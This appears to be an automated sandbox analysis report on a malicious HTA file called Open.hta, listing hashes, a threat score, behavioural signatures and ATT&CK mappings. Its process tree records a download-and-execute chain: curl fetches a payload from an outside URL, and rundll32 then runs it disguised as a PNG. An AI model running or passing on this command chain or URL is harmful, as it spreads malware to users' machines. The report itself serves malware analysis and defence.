Overview

overview

7

Static

static

1

Open.hta

windows7-x64

1

Open.hta

windows10-2004-x64

7

Resubmissions

02-02-2023 21:19

230202-z6jahaba9y 10

02-02-2023 21:19

230202-z6b67aba9w 7

02-02-2023 21:17

230202-z48sdafh78 7

02-02-2023 20:21

230202-y5afjaae3w 10

02-02-2023 20:20

230202-y4k6msfd36 7

02-02-2023 20:03

230202-ysnsdsac8z 7

02-02-2023 20:02

230202-yr9ngaac8w 7

02-02-2023 20:01

230202-yrllmsfb54 7

02-02-2023 19:47

230202-yhszcsab9z 7

02-02-2023 19:46

230202-yg5lrsfa45 7

Analysis

  • max time kernel
    948s
  • max time network
    950s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-02-2023 20:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Open.hta

  • Size

    3KB

  • MD5

    7daa66c5c04a63b630e284360740bc3f

  • SHA1

    13ccbcef1329ae8c204c13e757a867e31f3b62bc

  • SHA256

    35e319a9cd3e423081fa1d0a0c084f555b1c5fb1042189dd969d1706f6d25fe2

  • SHA512

    c23873af1524f9d97e4f4066a64240a6339c9ebe30ed1a623c60db683b0e85189dab28976f9116a7c9a38a864b9acdc8de66fda96ea7e3e58b46217efe965744

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4568
    • C:\Windows\SysWOW64\curl.exe
      "C:\Windows\System32\curl.exe" --output C:\ProgramData\1.png --url https://spincotech.com/8CoBExd/3.gif
      2⤵
        PID:5048
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\ProgramData\1.png,Wind
        2⤵
          PID:4268
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im mshta.exe
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1508

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1508-134-0x0000000000000000-mapping.dmp
        Download
      • memory/4268-133-0x0000000000000000-mapping.dmp
        Download
      • memory/5048-132-0x0000000000000000-mapping.dmp
        Download